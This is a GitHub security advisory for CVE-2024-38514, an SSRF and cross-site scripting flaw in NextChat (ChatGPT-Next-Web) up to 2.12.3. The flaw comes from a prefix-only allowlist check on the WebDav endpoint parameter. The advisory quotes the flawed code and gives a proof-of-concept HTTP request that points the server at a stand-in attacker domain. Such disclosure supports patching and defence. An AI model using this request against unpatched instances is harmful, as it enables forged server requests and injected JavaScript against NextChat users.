Skip to content

NextChat v2.12.3 Server-Side Request Forgery / Cross-Site Scripting

High
fred-bf published GHSA-gph5-rx77-3pjg Jun 24, 2024

Package

chatgpt-next-web

Affected versions

<= 2.12.3

Patched versions

2.12.4

Description

Summary

NexChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the endpoint GET parameter on the WebDav API endpoint.

Details

The vulnerability exists because of the following code snippet : https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/blob/b6735bffe4e2a79dc4aba6667a4faa7b8c1b3677/app/api/webdav/%5B...path%5D/route.ts#L28

// Validate the endpoint to prevent potential SSRF attacks
  if (
    !mergedAllowedWebDavEndpoints.some(
      (allowedEndpoint) => endpoint?.startsWith(allowedEndpoint),
    )
  )

This check seems incomplete because it validates if the URL specified in the endpoint GET parameter starts with the URL declared in the following file : https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/blob/b6735bffe4e2a79dc4aba6667a4faa7b8c1b3677/app/constant.ts#L205

export const internalAllowedWebDavEndpoints = [
  "https://dav.jianguoyun.com/dav/",
  "https://dav.dropdav.com/",
  "https://dav.box.com/dav",
  "https://nanao.teracloud.jp/dav/",
  "https://bora.teracloud.jp/dav/",
  "https://webdav.4shared.com/",
  "https://dav.idrivesync.com",
  "https://webdav.yandex.com",
  "https://app.koofr.net/dav/Koofr",
];

Some allowed URLs do not enforce the trailing slash or a specific folder, which allows an attacker to forge a valid URL which can then pass through the SSRF verification and trigger an arbitrary HTTPS call from the vulnerable instance.

Note that in the default configuration, the target of this arbitrary HTTPS call must have a valid SSL/TLS certificate however NextChat will throw a 500 error due to the verification failure.

PoC

Hosting a local instance, the HTTP request used is the following :

GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.attacker.tld/ HTTP/1.1
Host: 0.0.0.0:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1

The attacker.tld hostname should be replaced with your own domain name and you will start seeing requests coming from the vulnerable instance. For example, it is possible to achieve a Cross-Site Scripting attack by hosting malicious JavaScript code on your own server :

image

Impact

This SSRF / XSS vulnerability can be used to perform arbitrary HTTPS request from the vulnerable instance (MKCOL, PUT and GET methods supported), or to target NextChat users and make them execute arbitrary JavaScript code in their browser and in the vulnerable instance context.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVE ID

CVE-2024-38514